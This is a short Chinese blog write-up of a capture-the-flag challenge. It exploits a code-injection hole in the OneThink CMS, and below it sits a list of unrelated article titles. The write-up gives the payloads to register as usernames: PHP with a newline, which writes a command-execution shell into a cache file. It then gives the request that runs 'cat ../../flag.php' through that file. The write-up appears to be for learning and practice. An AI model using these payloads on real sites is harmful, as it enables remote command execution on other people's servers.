记一道onethink漏洞拿flag的题。

因为用户名长度被限制了,注册两个账号分别为

%0a$a=$_GET[a];//
%0aecho `$a`;// #(%0a是换行符的urlencode)

点击注册,抓包,先将%0a编码成的%250a还原成%0a,再对%0a urldecode,然后放包。



接着以同样的方法注册第二个的账户。

再一次登录注册的两个账户,在登录的时候也要像上面一样抓包修改%0a。

登录上第二个账户之后访问

/Runtime/Temp/2bb202459c30a1628513f40ab22fa01a.php?a=cat ../../flag.php

查看源代码得到flag

漏洞复现参考链接:https://www.anquanke.com/post/id/152584

最新文章

  1. Tech Websites
  2. Qt——浅谈样式表
  3. php经典算法(转载)
  4. 更新App版本的流程
  5. 谈谈自己对C语言中函数指针的一些理解 (第一次写博客,有点小兴奋哈)
  6. 基于SignalR的小型IM系统
  7. PHP入门part2
  8. hdu 2669 Romantic (乘法逆元)
  9. lnmp_auto:自动化安装lnmp环境脚本
  10. QQ空间分享功能(二)
  11. iOS开发之通知使用总结
  12. java处理日期时间
  13. [SQL]一组数据中Name列相同值的最大Je与最小je的差
  14. opengl截图
  15. schema对象介绍
  16. android 手电筒的实现
  17. Xml 学习二
  18. sublime text 3解放鼠标的快捷键总结
  19. util.go
  20. 解决反射型XSS漏洞攻击

热门文章

  1. js更改HTML样式
  2. PING命令执行漏洞-绕过空格
  3. 使用Linux Deploy将闲置的安卓手机改造简易服务器
  4. CRM系统什么时候需要使用
  5. hugegraph 源码解读 —— 索引与查询优化分析
  6. SpringBoot:SpringBoot中@Value注入失败
  7. nginx 基本配置
  8. 【Azure 应用服务】Azure Function App使用SendGrid发送邮件遇见异常消息The operation was canceled,分析源码逐步最终源端
  9. C# 8.0和.NET Core 3.0高级编程 分享笔记二:编程基础第一部分
  10. MySQL | Xtrabackup 的简介